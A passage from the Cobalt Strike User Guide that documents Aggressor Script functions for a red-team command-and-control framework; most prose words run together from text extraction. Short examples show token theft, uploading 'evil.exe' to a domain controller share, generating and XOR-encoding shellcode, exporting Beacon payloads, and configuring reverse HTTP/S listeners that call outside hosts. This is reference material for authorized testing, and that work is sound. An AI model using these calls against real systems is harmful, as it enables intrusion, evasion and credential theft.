AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDtotakethetokenfrom. $3-theOpenProcessTokenaccessmask. Example alias token-store_steal_and_use { btoken_store_steal_and_use($1, int($2), 11); } btoken_store_use AskBeacontouseatokenfromthetokenstore. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetokenID. Example alias token-store_use { btoken_store_use($1, int($2)); } bunlink AskBeacontodelinkaBeaconitsconnectedtooveraTCPsocketornamedpipe. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargethosttounlink(specifiedasanIPaddress) $3-(optional)thePIDofthetargetsessiontounlink Example CobaltStrikeUserGuide www.fortra.com page:346
AggressorScript/Functions bunlink($1, "172.16.48.3"); bupload AskaBeacontouploadafile Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thelocalpathtothefiletoupload Example bupload($1, script_resource("evil.exe")); bupload_raw AskaBeacontouploadafile Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theremotefilenameofthefile $3-therawcontentofthefile $4-(optional)thelocalpathtothefile(ifthereisone) Example $data = artifact("my listener", "exe"); bupload_raw($1, "\\DC\C$\foo.exe", $data); bwdigest REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly. bwinrm CobaltStrikeUserGuide www.fortra.com page:347
AggressorScript/Functions REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options. bwmi REMOVED Removed in Cobalt Strike 4.0. call Issueacalltotheteamserver. Arguments $1-thecommandname $2-acallbacktoreceivearesponsetothisrequest.Thecallbackwillreceivetwoarguments. Thefirstisthecallname.Thesecondistheresponse. ...-oneormoreargumentstopassintothiscall. Example call("aggressor.ping", { warn(@_); }, "this is my value"); closeClient ClosethecurrentCobaltStriketeamserverconnection. Example closeClient(); colorPanel GenerateaJavacomponenttosetaccentcolorswithinCobaltStrike'sdatamodel Arguments $1-theprefix CobaltStrikeUserGuide www.fortra.com page:348
AggressorScript/Functions $2-anarrayofIDstochangecolorsfor Example popup targets { menu "&Color" { insert_component(colorPanel("targets", $1)); } } Seealso &highlight credential_add Addacredentialtothedatamodel Arguments $1-username $2-password $3-realm $4-source $5-host Example command falsecreds { for ($x = 0; $x < 100; $x++) { credential_add("user $+ $x", "password $+ $x"); } } credentials ReturnsalistofapplicationcredentialsinCobaltStrike'sdatamodel. CobaltStrikeUserGuide www.fortra.com page:349
AggressorScript/Functions Returns Anarrayofdictionaryobjectswithinformationabouteachcredentialentry. Example printAll(credentials()); custom_event BroadcastacustomeventtoallCobaltStrikeclients. Arguments $1-thetopicname $2-theeventdata Example custom_event("my-topic", %(foo => 42, bar => "hello")); custom_event_private SendacustomeventtoonespecificCobaltStrikeclient. Arguments $1-whotosendthecustomeventto $2-thetopicname $3-theeventdata Example custom_event_private("neo", "my-topic", 42); data_keys CobaltStrikeUserGuide www.fortra.com page:350
AggressorScript/Functions Listthequery-ablekeysfromCobaltStrike'sdatamodel Returns Alistofkeysthatyoumayquerywith&data_query Example foreach $key (data_keys()) { println("\n\c4=== $key ===\n"); println(data_query($key)); } data_query QueriesCobaltStrike'sdatamodel Arguments $1-thekeytopullfromthedatamodel Returns ASleeprepresentationofthequerieddata. Example println(data_query("targets")); dbutton_action Addsanactionbuttontoa&dialog.Whenthisbuttonispressed,thedialogclosesandits callbackiscalled.Youmayaddmultiplebuttonstoadialog.CobaltStrikewilllinethesebuttons upinarowandcenterthematthebottomofthedialog. Arguments $1-the$dialogobject $2-thebuttonlabel CobaltStrikeUserGuide www.fortra.com page:351
AggressorScript/Functions Example dbutton_action($dialog, "Start"); dbutton_action($dialog, "Stop"); dbutton_help AddsaHelpbuttontoa&dialog.Whenthisbuttonispressed,CobaltStrikewillopentheuser's browsertothespecifiedURL. Arguments $1-the$dialogobject $2-theURLtogoto Example dbutton_help($dialog, "http://www.google.com"); dialog Createadialog.Use&dialog_showtoshowit. Arguments $1-thetitleofthedialog $2-a%dictionarymappingrownamestodefaultvalues $3-acallbackfunction.Calledwhentheuserpressesa&dbutton_actionbutton.$1isa referencetothedialog.$2isthebuttonname.$3isadictionarythatmapseachrow'snameto itsvalue. Returns Ascalarwitha$dialogobject. Example CobaltStrikeUserGuide www.fortra.com page:352
AggressorScript/Functions sub callback {
prints: Pressed Go, a is: Apple
println("Pressed $2 $+ , a is: " . $3['a']); } $dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback); drow_text($dialog, "a", "Fruit: "); drow_text($dialog, "b", "Rodent: "); dbutton_action($dialog, "Go"); dialog_show($dialog); dialog_description Addsadescriptiontoa&dialog Arguments $1-a$dialogobject $2-thedescriptionofthisdialog Example dialog_description($dialog, "I am the Hello World dialog."); dialog_show Showsa&dialog. Arguments $1-the$dialogobject Example dialog_show($dialog); dispatch_event CallafunctioninJavaSwing'sEventDispatchThread.Java'sSwingLibraryisnotthreadsafe. AllchangestotheuserinterfaceshouldhappenfromtheEventDispatchThread. CobaltStrikeUserGuide www.fortra.com page:353
AggressorScript/Functions Arguments $1-thefunctiontocall Example dispatch_event({ println("Hello World"); }); downloads ReturnsalistofdownloadsinCobaltStrike'sdatamodel. Returns Anarrayofdictionaryobjectswithinformationabouteachdownloadedfile. Example printAll(downloads()); drow_beacon Addsabeaconselectionrowtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_beacon($dialog, "bid", "Session: "); drow_checkbox CobaltStrikeUserGuide www.fortra.com page:354
AggressorScript/Functions Addsacheckboxtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow $4-thetextnexttothecheckbox Example drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare"); drow_combobox Addsacomboboxtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow $4-anarrayofoptionstochoosefrom Example drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat")); drow_exploits Addsaprivilegeescalationexploitselectionrowtoa&dialog Arguments $1-a$dialogobject CobaltStrikeUserGuide www.fortra.com page:355
AggressorScript/Functions $2-thenameofthisrow $3-thelabelforthisrow Example drow_exploits($dialog, "exploit", "Exploit: "); drow_file Addsafilechooserrowtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_file($dialog, "file", "Choose: "); drow_interface AddsaVPNinterfaceselectionrowtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_interface($dialog, "int", "Interface: "); CobaltStrikeUserGuide www.fortra.com page:356
AggressorScript/Functions drow_krbtgt Addsakrbtgtselectionrowtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_krbtgt($dialog, "hash", "krbtgt hash: "); drow_listener Addsalistenerselectionrowtoa&dialog.Thisrowonlyshowslistenerswithstagers(e.g., windows/beacon_https/reverse_https). Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_listener($dialog, "listener", "Listener: "); drow_listener_smb DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to &drow_listener_stage drow_listener_stage CobaltStrikeUserGuide www.fortra.com page:357
AggressorScript/Functions Addsalistenerselectionrowtoa&dialog.ThisrowshowsallBeaconandForeignlistener payloads. Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_listener_stage($dialog, "listener", "Stage: "); drow_mailserver Addsamailserverfieldtoa&dialog. Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_mailserver($dialog, "mail", "SMTP Server: "); drow_proxyserver DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener. Addsaproxyserverfieldtoa&dialog. Arguments $1-a$dialogobject CobaltStrikeUserGuide www.fortra.com page:358
AggressorScript/Functions $2-thenameofthisrow $3-thelabelforthisrow Example drow_proxyserver($dialog, "proxy", "Proxy: "); drow_site Addsasite/URLfieldtoa&dialog. Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_site($dialog, "url", "Site: "); drow_text Addsatextfieldrowtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow $4-Optional.Thewidthofthistextfield(incharacters).Thisvalueisn'talwayshonored(it won'tshrinkthefield,butitwillmakeitwider). Example CobaltStrikeUserGuide www.fortra.com page:359
AggressorScript/Functions drow_text($dialog, "name", "Name: "); drow_text_big Addsamulti-linetextfieldtoa&dialog Arguments $1-a$dialogobject $2-thenameofthisrow $3-thelabelforthisrow Example drow_text_big($dialog, "addr", "Address: "); dstamp Formatatimeintoadate/timevalue.Thisvalueincludesseconds. Arguments $1-thetime[millisecondssincetheUNIXepoch] Example println("The time is now: " . dstamp(ticks())); Seealso &tstamp elog Publishanotificationtotheeventlog Arguments CobaltStrikeUserGuide www.fortra.com page:360
AggressorScript/Functions $1-themessage Example elog("The robot invasion has begun!"); encode Obfuscateaposition-independentblobofcodewithanencoder. Arguments $1-positionindependentcode(e.g.,shellcode,"raw"stagelessBeacon)toapplyencoderto $2-theencodertouse $3-thearchitecture(e.g.,x86,x64) Encoder Description alpha Alphanumericencoder(x86-only) xor XOR encoder Notes l Theencodedposition-independentblobmustrunfrom amemorypagethathasRWX permissionsorthedecodestepwillcrashthecurrentprocess. l alpha encoder:TheEDIregistermustcontaintheaddressoftheencodedblob. &encodeprependsa10-byte(non-alphanumeric)program tothebeginningofthe alphanumericencodedblob.Thisprogram calculatesthelocationoftheencodedblob andsetsEDIforyou.IfyouplantosetEDIyourself,youmayremovethesefirst10bytes. Returns Aposition-independentblobthatdecodestheoriginalstringandpassesexecutiontoit. Example
generate shellcode for a listener
$stager = shellcode("my listener", false "x86"); CobaltStrikeUserGuide www.fortra.com page:361
AggressorScript/Functions
encode it.
$stager = encode($stager, "xor", "x86"); extract_reflective_loader ExtracttheexecutablecodeforareflectiveloaderfromaBeaconObjectFile(BOF). Arguments $1-BeaconObjectFiledatathatcontainsareflectiveloader. Returns TheReflectiveLoaderbinaryexecutablecodeextractedfromtheBeaconObjectFiledata. Example SeeBEACON_RDLL_GENERATEhook
---------------------------------------------------------------------
extract loader from BOF.
---------------------------------------------------------------------
$loader = extract_reflective_loader($data); file_browser OpentheFileBrowser.Thisfunctiondoesnothaveanyparameters. fireAlias Runsauser-definedalias Arguments $1-thebeaconidtorunthealiasagainst $2-thealiasnametorun $3-theargumentstopasstothealias. Example CobaltStrikeUserGuide www.fortra.com page:362
AggressorScript/Functions
run the foo alias when a new Beacon comes in
on beacon_initial { fireAlias($1, "foo", "bar!"); } fireEvent Fireanevent. Arguments $1-theeventname ...-theeventarguments. Example on foo { println("Argument is: $1"); } fireEvent("foo", "Hello World!"); format_size Formatsanumberintoasize(e.g.,1024=>1kb) Arguments $1-thesizetoformat Returns Astringrepresentingahumanreadabledatasize. Example println(format_size(1024)); getAggressorClient CobaltStrikeUserGuide www.fortra.com page:363
AggressorScript/Functions Returnstheaggressor.AggressorClientJavaobject.Thiscanreachanythinginternalwithinthe currentCobaltStrikeclientcontext. Example $client = getAggressorClient(); gunzip Decompressastring(GZIP). Arguments $1-thestringtocompress Returns Theargumentprocessedbythegzipde-compressor Example println(gunzip(gzip("this is a test"))); Seealso &gzip gzip GZIPastring. Arguments $1-thestringtocompress Returns Theargumentprocessedbythegzipcompressor Example CobaltStrikeUserGuide www.fortra.com page:364
AggressorScript/Functions println(gzip("this is a test")); Seealso &gunzip highlight Insertanaccent(colorhighlight)intoCobaltStrike'sdatamodel Arguments $1-thedatamodel $2-anarrayofrowstohighlight $3-theaccenttype Notes l Datamodelrowsinclude:applications,beacons,credentials,listeners,services,and targets. l Accentoptionsare: Accent Color [empty] nohighlight good Green bad Red neutral Yellow ignore Grey cancel DarkBlue Example command admincreds { local('@creds');
find all of our creds that are user Administrator.
foreach $entry (credentials()) { CobaltStrikeUserGuide www.fortra.com page:365
AggressorScript/Functions if ($entry['user'] eq "Administrator") { push(@creds, $entry); } }
highlight all of them green!
highlight("credentials", @creds, "good"); } host_delete Deleteahostfromthetargetsmodel Arguments $1-theIPv4orIPv6addressofthistarget[youmayspecifyanarrayofhoststoo] Example
clear all hosts
host_delete(hosts()); host_info Getinformationaboutatarget. Arguments $1-thehostIPv4orIPv6address $2-[Optional]thekeytoextractavaluefor Returns %info = host_info("address"); Returnsadictionarywithknowninformationaboutthistarget. $value = host_info("address", "key"); Returnsthevalueforthespecifiedkeyfromthistarget'sentryinthedatamodel. CobaltStrikeUserGuide www.fortra.com page:366
AggressorScript/Functions Example
create a script console alias to dump host info
command host { println("Host $1"); foreach $key => $value (host_info($1)) { println("$[15]key $value"); } } host_update Addorupdateahostinthetargetsmodel Arguments $1-theIPv4orIPv6addressofthistarget[youmayspecifyanarrayofhoststoo] $2-theDNSnameofthistarget $3-thetarget'soperatingsystem $4-theoperatingsystemversionnumber(e.g.,10.0) $5-anoteforthetarget. Note Youmayspecifya$nullvalueforanyargumentand,ifthehostexists,nochangewillbemade tothatvalue. Example host_update("192.168.20.3", "DC", "Windows", 10.0); hosts ReturnsalistofIPaddressesfromCobaltStrike'stargetmodel Returns CobaltStrikeUserGuide www.fortra.com page:367
AggressorScript/Functions AnarrayofIPaddresses Example printAll(hosts()); insert_component Addajavax.swing.JComponentobjecttothemenutree Arguments $1-thecomponenttoadd insert_menu Bringmenusassociatedwithapopuphookintothecurrentmenutree. Arguments $1-thepopuphook ...-additionalargumentsarepassedtothechildpopuphook. Example popup beacon {
menu definitions above this point
insert_menu("beacon_bottom", $1);
menu definitions below this point
} iprange GenerateanarrayofIPv4addressesbasedonastringdescription Arguments CobaltStrikeUserGuide www.fortra.com page:368
AggressorScript/Functions $1-astringwithadescriptionofIPv4ranges Range Result 192.168.1.2 TheIP4address192.168.1.2 192.168.1.1,192.168.1.2 TheIPv4addresses192.168.1.1and192.168.1.2 192.168.1.0/24 TheIPv4addresses192.168.1.0through192.168.1.255 192.168.1.18-192.168.1.30 TheIPv4addresses192.168.1.18through192.168.1.29 192.168.1.18-30 TheIPv4addresses192.168.1.18through192.168.1.29 Returns AnarrayofIPv4addresseswithinthespecifiedranges. Example printAll(iprange("192.168.1.0/25")); keystrokes ReturnsalistofkeystrokesfromCobaltStrike'sdatamodel. Returns Anarrayofdictionaryobjectswithinformationaboutrecordedkeystrokes. Example printAll(keystrokes()); licenseKey DEPRECATED This function is deprecated in Cobalt Strike 4.6. The function will now return an empty string. GetthelicensekeyforthisinstanceofCobaltStrike Returns CobaltStrikeUserGuide www.fortra.com page:369
AggressorScript/Functions Yourlicensekey. Example println("Your key is: " . licenseKey()); listener_create DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext Createanewlistener. Arguments $1-thelistenername $2-thepayload(e.g.,windows/beacon_http/reverse_http) $3-thelistenerhost $4-thelistenerport $5-acommaseparatedlistofaddressesforlistenertobeaconto Example
create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https", "ads.losenolove.com", 443);
create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http", "www.losenolove.com", 80, "www.losenolove.com, www2.losenolove.com"); listener_create_ext Createanewlistener. Arguments $1-thelistenername CobaltStrikeUserGuide www.fortra.com page:370
AggressorScript/Functions $2-thepayload(e.g.,windows/beacon_http/reverse_http) $3-amapwithkey/valuepairsthatspecifyoptionsforthelistener Note Thefollowingpayloadoptionsarevalidfor$2: Payload Type windows/beacon_dns/reverse_dns_txt BeaconDNS windows/beacon_http/reverse_http BeaconHTTP windows/beacon_https/reverse_https BeaconHTTPS windows/beacon_bind_pipe BeaconSMB windows/beacon_bind_tcp BeaconTCP windows/beacon_extc2 ExternalC2 windows/foreign/reverse_http ForeignHTTP windows/foreign/reverse_https ForeignHTTPS Thefollowingkeysarevalidfor$3: Key DNS HTTP/S SMB TCP (Bind) althost HTTPHostHeader bindto bindport bindport beacons c2hosts c2hosts bindhost host staginghost staginghost maxretry maxretry maxretry port c2port c2port pipename port profile profilevariant proxy proxyconfig strategy hostrotation hostrotation ThefollowinghostrotationValuesarevalidforthe'strategy'Key: CobaltStrikeUserGuide www.fortra.com page:371
AggressorScript/Functions Option round-robin random failover failover-5x failover-50x failover-100x failover-1m failover-5m failover-15m failover-30m failover-1h failover-3h failover-6h failover-12h failover-1d rotate-1m rotate-5m rotate-15m rotate-30m rotate-1h rotate-3h rotate-6h rotate-12h rotate-1d Note Themaxretryvalueusesthefollowingsyntaxofexit-[max_attempts]-[increase_attempts]- [duration][m,h,d].Forexample'exit-10-5-5m'willexitbeaconafter10failedattemptsandwill increasesleeptimeafter5failedattemptsto5minutes.Thesleeptimewillnotbeupdatedifthe currentsleeptimeisgreaterthanthespecifieddurationvalue.Thesleeptimewillbeaffectedby CobaltStrikeUserGuide www.fortra.com page:372
AggressorScript/Functions thecurrentjittervalue.Onasuccessfulconnectionthefailedattemptscountwillberesetto zeroandthesleeptimewillberesettothepriorvalue. TheproxyconfigurationstringisthesamestringyouwouldinputintoCobaltStrike'slistener dialog.directignoresthelocalproxyconfigurationandattemptsadirectconnection. protocol://user:[email protected]:portspecifieswhichproxyconfigurationthe artifactshoulduse.Theusernameandpasswordareoptional(e.g., protocol://host:portisfine).Theacceptableprotocolsaresocksandhttp.Setthe proxyconfigurationstringto$nullor""tousethedefaultbehavior. Example
create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https", %(host => "ads.losenolove.com", port => 443));
create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http", %(host => "www.losenolove.com", port => 80, beacons => "www.losenolove.com, www2.losenolove.com"));
create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http", %(host => "stage.host", profile => "default", port => 80, beacons => "b1.host,b2.host", althost => "alt.host", bindto => 8080, strategy => "failover-5x", max_retry => "exit-10-5-5m", proxy => "proxy.host")); listener_delete Stopandremovealistener. Arguments $1-thelistenername Example listener_delete("Beacon HTTP"); CobaltStrikeUserGuide www.fortra.com page:373
AggressorScript/Functions listener_describe Describealistener. Arguments $1-thelistenername $2-(optional)theremotetargetthelistenerisdestinedfor Returns Astringdescribingthelistener Example foreach $name (listeners()) { println("$name is: " . listener_describe($name)); } listener_info Getinformationaboutalistener. Arguments $1-thelistenername $2-(optional)thekeytoextractavaluefor Returns %info = listener_info("listener name"); Returnsadictionarywiththemetadataforthislistener. $value = listener_info("listener name", "key"); Returnsthevalueforthespecifiedkeyfromthislistener'smetadata CobaltStrikeUserGuide www.fortra.com page:374
AggressorScript/Functions Example
create a script console alias to dump listener info
command dump { println("Listener $1"); foreach $key => $value (listener_info($1)) { println("$[15]key $value"); } } listener_pivot_create Createanewpivotlistener. Arguments $1-theBeaconID $2-thelistenername $3-thepayload(e.g.,windows/beacon_reverse_tcp) $4-thelistenerhost $5-thelistenerport Note Theonlyvalidpayloadargumentiswindows/beacon_reverse_tcp. Example
create a pivot listener:
$1 = beaconID, $2 = name, $3 = port
alias plisten { local('$lhost $bid $name $port');
extract our arguments
($bid, $name, $port) = @_;
get the name of our target
$lhost = beacon_info($1, "computer"); CobaltStrikeUserGuide www.fortra.com page:375
AggressorScript/Functions btask($1, "create TCP listener on $lhost $+ : $+ $port"); listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port); } listener_restart Restartalistener Arguments $1-thelistenername Example listener_restart("Beacon HTTP"); listeners Returnalistoflistenernames(withstagersonly!)acrossallteamserversthisclientis connectedto. Returns Anarrayoflistenernames. Example printAll(listeners()); listeners_local Returnalistoflistenernames.Thisfunctionlimitsitselftothecurrentteamserveronly.External C2listenernamesareomitted. Returns Anarrayoflistenernames. Example CobaltStrikeUserGuide www.fortra.com page:376
AggressorScript/Functions printAll(listeners_local()); listeners_stageless Returnalistoflistenernamesacrossallteamserversthisclientisconnectedto.ExternalC2 listenersarefiltered(asthey'renotactionableviastagingorexportingasaReflectiveDLL). Returns Anarrayoflistenernames. Example printAll(listeners_stageless()); localip GettheIPaddressassociatedwiththeteamserver. Returns Astringwiththeteamserver'sIPaddress. Example println("I am: " . localip()); menubar Addatop-levelitemtothemenubar. Arguments $1-thedescription $2-thepopuphook Example CobaltStrikeUserGuide www.fortra.com page:377
AggressorScript/Functions popup mythings { item "Keep out" { } } menubar("My &Things", "mythings"); mynick GetthenicknameassociatedwiththecurrentCobaltStrikeclient. Returns Astringwithyournickname. Example println("I am: " . mynick()); nextTab Activatethetabthatistotherightofthecurrenttab. Example bind Ctrl+Right { nextTab(); } on Registeraneventhandler.Thisisanalternatetotheonkeyword. Arguments $1-thenameoftheeventtorespondto $2-acallbackfunction.Calledwhentheeventhappens. Example CobaltStrikeUserGuide www.fortra.com page:378
AggressorScript/Functions sub foo { blog($1, "Foo!"); } on("beacon_initial", &foo); openAboutDialog Openthe"AboutCobaltStrike"dialog Example openAboutDialog(); openApplicationManager Opentheapplicationmanager(systemprofilerresults)tab. Example openApplicationManager(); openAutoRunDialog Opentheautorundialog. Example openAutoRunDialog(); openBeaconBrowser Openthebeaconbrowsertab. Example openBeaconBrowser(); openBeaconConsole CobaltStrikeUserGuide www.fortra.com page:379
AggressorScript/Functions OpentheconsoletointeractwithaBeacon Arguments $1-theBeaconIDtoapplythisfeatureto Example item "Interact" { local('$bid'); foreach $bid ($1) { openBeaconConsole($bid); } } openBrowserPivotSetup openthebrowserpivotsetupdialog Arguments $1-theBeaconIDtoapplythisfeatureto Example item "Browser Pivoting" { local('$bid'); foreach $bid ($1) { openBrowserPivotSetup($bid); } } openBypassUACDialog REMOVEDRemovedinCobaltStrike4.1. openCloneSiteDialog Openthedialogforthewebsiteclonetool. Example CobaltStrikeUserGuide www.fortra.com page:380
AggressorScript/Functions openCloneSiteDialog(); openConnectDialog Opentheconnectdialog. Example openConnectDialog(); openCovertVPNSetup opentheCovertVPNsetupdialog Arguments $1-theBeaconIDtoapplythisfeatureto Example item "VPN Pivoting" { local('$bid'); foreach $bid ($1) { openCovertVPNSetup($bid); } } openCredentialManager Openthecredentialmanagertab. Example openCredentialManager(); openDefaultShortcutsDialog OpentheDefaultKeyboardShortcutsdialog.Thisfunctiondoesnothaveanyparameters. CobaltStrikeUserGuide www.fortra.com page:381
AggressorScript/Functions openDownloadBrowser Openthedownloadbrowsertab Example openDownloadBrowser(); openElevateDialog Openthedialogtolaunchaprivilegeescalationexploit. Arguments $1-thebeaconID Example item "Elevate" { local('$bid'); foreach $bid ($1) { openElevateDialog($bid); } } openEventLog Opentheeventlog. Example openEventLog(); openFileBrowser OpenthefilebrowserforaBeacon Arguments CobaltStrikeUserGuide www.fortra.com page:382
AggressorScript/Functions $1-theBeaconIDtoapplythisfeatureto Example item "Browse Files" { local('$bid'); foreach $bid ($1) { openFileBrowser($bid); } } openGoldenTicketDialog openadialogtohelpgenerateagoldenticket Arguments $1-theBeaconIDtoapplythisfeatureto Example item "Golden Ticket" { local('$bid'); foreach $bid ($1) { openGoldenTicketDialog($bid); } } openHTMLApplicationDialog OpentheHTMLApplicationDialog. Example openHTMLApplicationDialog(); openHostFileDialog Openthehostfiledialog. CobaltStrikeUserGuide www.fortra.com page:383
AggressorScript/Functions Example openHostFileDialog(); openInterfaceManager OpenthetabtomanageCovertVPNinterfaces Example openInterfaceManager(); openJavaSignedAppletDialog OpentheJavaSignedAppletdialog Example openJavaSignedAppletDialog(); openJavaSmartAppletDialog OpentheJavaSmartAppletdialog Example openJavaSmartAppletDialog(); openJumpDialog OpenCobaltStrike'slateralmovementdialog Arguments $1-thetypeoflateralmovement.See&beacon_remote_exploitsforalistofoptions.sshand ssh-keyareoptionstoo. $2-anarrayoftargetstoapplythisactionagainst CobaltStrikeUserGuide www.fortra.com page:384
AggressorScript/Functions Example openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4")); openKeystrokeBrowser Openthekeystrokebrowsertab Example openKeystrokeBrowser(); openListenerManager Openthelistenermanager Example openListenerManager(); openMakeTokenDialog openadialogtohelpgenerateanaccesstoken Arguments $1-theBeaconIDtoapplythisfeatureto Example item "Make Token" { local('$bid'); foreach $bid ($1) { openMakeTokenDialog($bid); } } openMalleableProfileDialog CobaltStrikeUserGuide www.fortra.com page:385
AggressorScript/Functions OpenthemalleableC2profiledialog. Example openMalleableProfileDialog(); openOfficeMacro Opentheofficemacroexportdialog Example openOfficeMacroDialog(); openOneLinerDialog OpenthedialogtogenerateaPowerShellone-linerforthisspecificBeaconsession. Arguments $1-thebeaconID Example item "&One-liner" { openOneLinerDialog($1); } openOrActivate IfaBeaconconsoleexists,makeitactive.IfaBeaconconsoledoesnotexist,openit. Arguments $1-theBeaconID Example CobaltStrikeUserGuide www.fortra.com page:386
AggressorScript/Functions item "&Activate" { local('$bid'); foreach $bid ($1) { openOrActivate($bid); } } openPayloadGeneratorDialog OpenthePayloadGeneratordialog. Example openPayloadGeneratorDialog(); openPayloadHelper Openapayloadchooserdialog. Arguments $1-acallbackfunction.Arguments:$1-theselectedlistener. Example openPayloadHelper(lambda({ bspawn($bid, $1); }, $bid => $1)); openPivotListenerSetup openthepivotlistenersetupdialog Arguments $1-theBeaconIDtoapplythisfeatureto Example item "Listener..." { local('$bid'); CobaltStrikeUserGuide www.fortra.com page:387
AggressorScript/Functions foreach $bid ($1) { openPivotListenerSetup($bid); } } openPortScanner Opentheportscannerdialog Arguments $1-anarrayoftargetstoscan Example openPortScanner(@("192.168.1.3")); openPortScannerLocal OpentheportscannerdialogwithoptionstotargetaBeacon'slocalnetwork Arguments $1-thebeacontotargetwiththisfeature Example item "Scan" { local('$bid'); foreach $bid ($1) { openPortScannerLocal($bid); } } openPowerShellWebDialog OpenthedialogtosetupthePowerShellWebDeliveryAttack Example openPowerShellWebDialog(); CobaltStrikeUserGuide www.fortra.com page:388
AggressorScript/Functions openPreferencesDialog Openthepreferencesdialog Example openPreferencesDialog(); openProcessBrowser OpenaprocessbrowserforoneormoreBeacons Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example item "Processes" { openProcessBrowser($1); } openSOCKSBrowser OpenthetabtolistSOCKSproxyservers Example openSOCKSBrowser(); openSOCKSSetup opentheSOCKSproxyserversetupdialog Arguments $1-theBeaconIDtoapplythisfeatureto Example CobaltStrikeUserGuide www.fortra.com page:389
AggressorScript/Functions item "SOCKS Server" { local('$bid'); foreach $bid ($1) { openSOCKSSetup($bid); } } openScreenshotBrowser Openthescreenshotbrowsertab Example openScreenshotBrowser(); openScriptConsole OpentheAggressorScriptconsole. Example openScriptConsole(); openScriptManager Openthetabforthescriptmanager. Example openScriptManager(); openScriptedWebDialog OpenthedialogtosetupaScriptedWebDeliveryAttack Example openScriptedWebDialog(); CobaltStrikeUserGuide www.fortra.com page:390
AggressorScript/Functions openServiceBrowser Openservicebrowserdialog Arguments $1-anarrayoftargetstoshowservicesfor Example openServiceBrowser(@("192.168.1.3")); openSiteManager Openthesitemanager. Example openSiteManager(); openSpawnAsDialog Opendialogtospawnapayloadasanotheruser Arguments $1-theBeaconIDtoapplythisfeatureto Example item "Spawn As..." { local('$bid'); foreach $bid ($1) { openSpawnAsDialog($bid); } } openSpearPhishDialog CobaltStrikeUserGuide www.fortra.com page:391
AggressorScript/Functions Openthedialogforthespearphishingtool. Example openSpearPhishDialog(); openSystemInformationDialog Openthesysteminformationdialog. Example openSystemInformationDialog(); openSystemProfilerDialog Openthedialogtosetupthesystemprofiler. Example openSystemProfilerDialog(); openTargetBrowser Openthetargetsbrowser Example openTargetBrowser(); openWebLog Opentheweblogtab. Example openWebLog(); CobaltStrikeUserGuide www.fortra.com page:392
AggressorScript/Functions openWindowsDropperDialog REMOVED Removed in Cobalt Strike 4.0. openWindowsExecutableDialog OpenthedialogtogenerateaWindowsexecutable. Example openWindowsExecutableDialog(); openWindowsExecutableStage OpenthedialogtogenerateastagelessWindowsexecutable. Example openWindowsExecutableStage(); openWindowsExecutableStageAllDialog Openthedialogtogenerateallofthestagelesspayloads(inx86andx64)forallofthe configuredlisteners.ThisdialogcanalsobefoundintheUImenuunderPayloads -> Windows Stageless Generate all Payloads. Example openWindowsExecutableStageAllDialog(); payload ExportsarawpayloadforaspecificCobaltStrikelistener. Arguments $1-thelistenername $2-x86|x64thearchitectureofthepayload CobaltStrikeUserGuide www.fortra.com page:393
AggressorScript/Functions $3-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen done).Use'thread'ifinjectingintoanexistingprocess. $4-Astringvalueforthesystemcallmethod.Validvaluesare: None:UsethestandardWindowsAPIfunction. Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthefunction. $5-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank string). Returns Ascalarcontainingposition-independentcodeforthespecifiedlistener. Example $data = payload("my listener", "x86", "process", "Direct"); $handle = openf(">out.bin"); writeb($handle, $data); closef($handle); payload_bootstrap_hint GettheoffsettofunctionpointerhintsusedbyBeacon'sReflectiveLoader.Populatethesehints withtheasked-forprocessaddressestohaveBeaconloaditselfintomemoryinamoreOPSEC- safeway. Arguments $1-thepayloadposition-independentcode(specifically,Beacon) $2-thefunctiontogetthepatchlocationfor Notes CobaltStrikeUserGuide www.fortra.com page:394
